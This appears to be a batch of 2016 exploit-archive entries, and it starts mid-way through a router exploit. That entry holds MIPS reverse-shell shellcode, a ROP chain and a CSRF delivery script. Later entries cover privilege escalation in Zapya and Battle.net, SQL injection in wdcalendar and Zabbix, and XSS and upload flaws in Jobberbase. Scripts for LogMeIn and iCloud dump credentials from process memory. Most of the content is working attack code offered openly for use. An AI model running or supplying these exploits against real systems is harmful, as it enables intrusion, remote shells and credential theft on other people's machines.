"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
# Port 8080
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
# Store Port
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 192.168.206.2
"\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01
"\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
# getRect() son
huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
huge_string += "!" # Filler
huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
huge_string += "\x44\x44\x44\x44" * 6 # padding
huge_string += struct.pack(">L",0x31313131) # s0 - Sleep
huge_string += struct.pack(">L",0x2aafc840) # s1
huge_string += struct.pack(">L",0x34343434) # s2
huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
huge_string += "\x45\x45\x45\x45" * 9 # Padding
huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
huge_string += "\x46\x46\x46\x46" * 10
huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
huge_string += shellcode # shellcode start
'''
NOTES
libc = 0x2aad0000
0x2aafc840 (Sleep)
Gadget 1
0x2aafc840: move t9,s0 # Sleep
0x2aafc844: jalr t9 # call sleep. The rest of the instructions will not block out payload and are not included.
Gadget 2
0x2aaf9f38: move t9,s1 # Addr to Gadget 3
0x2aaf9f3c: lw ra,52(sp)
0x2aaf9f40: lw s3,48(sp)
0x2aaf9f44: lw s2,44(sp)
0x2aaf9f48: lw s1,40(sp)
0x2aaf9f4c: lw s0,36(sp)
0x2aaf9f50: jr t9 # Call Gadget 3
Gadget 3
0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
0x2aaf980c: lw ra,52(sp) # load Ret addr
0x2aaf9810: jr ra # ret
Gadget 4 (Stack Exec)
0x2aaf97fc: move t9,a0 # move A0 which contains the address of the stack
0x2aaf9800: sw v0,24(sp)
0x2aaf9804: jalr t9 # Jump to the stack
0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
'''
csrf_file = open('a.js', 'wb')
params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
# Write CSRF PoC
csrf_file.write('function getrekt(){')
csrf_file.write('var x = new XMLHttpRequest();\n')
csrf_file.write(destination_addr)
csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
csrf_file.write('x.send("' + params + '");')
csrf_file.write('}\ngetrekt();')
# Close file since we're doing writing to it.
csrf_file.close()
# Now Host the CSRF File
mac = get_mac()
PORT = 80 # This is why superuser rights are needed
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m"
httpd.serve_forever()
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A
======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Window’s Phone, PC, and Mac computers in an instant.
# It’s Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================
# Proof Of Concept :
# 1- Install Zapya Desktop .
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.
==================
# Discovered By Arash Khazaei
==================
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of
the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just
the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.
2. Proof
C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
3. Exploit:
Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.
# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
* Affected file -> edit.php and edit.db.php
* Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
* Vulnerable code:
function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly
Jobberbase: http://www.jobberbase.com/
Version: 2.0
By Ross Marks: http://www.rossmarks.co.uk
1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there
3) reflect XSS in username - http://example.com/admin/
eg. "><script>alert(1)</script>
reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
4) persistant XSS on admin backend homepage
create a job and give the URL:
" onhover="alert(1)
persistant XSS - admin add to category name (no protection)
5) unrestricted file upload
upload CV accepts any filetype appends _ uniqueid() to filename
eg. "file.php" becomes "file_<uniqueid>.php"
uniquid in in insecure method for generating random sequences and is based on microtime
if the server is using an older version of PHP a null byte can be used
ie. "test.php%00.php" would be uploaded as "test.php"
6) code execution race condition:
if the admin has chosen to not store uploaded CV's
they are first moved from /tmp to the writable /upload directory before being unlinked
this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted
7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
days_behind parameter is vulnerable
** notes **
admin change password page don't need old password, no csrf token just a simple POST request.
admin password stored in md5 format unsalted
cookies do NOT have "secure" or "HTTPonly" flags enabled
no csrf anywhere
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=20).read()
except Exception, msg:
print '\t\tOpps,an error occurs...',msg
else:
result_reg = re.compile(reg)
results = result_reg.findall(response)
print payload #Uncomment this to see details
if results:
return results[0]
def exploit(url,userid):
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
if(password):
print '[+]Username~Password : %s' % password
else:
print '[-]Get Password Failed'
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
if(session_id):
print "[+]Session_id:%s" % session_id
else:
print "[-]Get Session id Failed"
print '\n'
def main():
print '=' * 70
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
print '\t\t Author:Zzzians(Zzzians@gmail.com)'
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
print '\t\t\t Time:2016-08-20\n'
urls = ["http://10.15.5.86"]
ids = [1,2]
for url in urls:
if url[-1] != '/': url += '/'
print '='*25 + url + '='*25
for userid in ids:
exploit(url,userid)
main()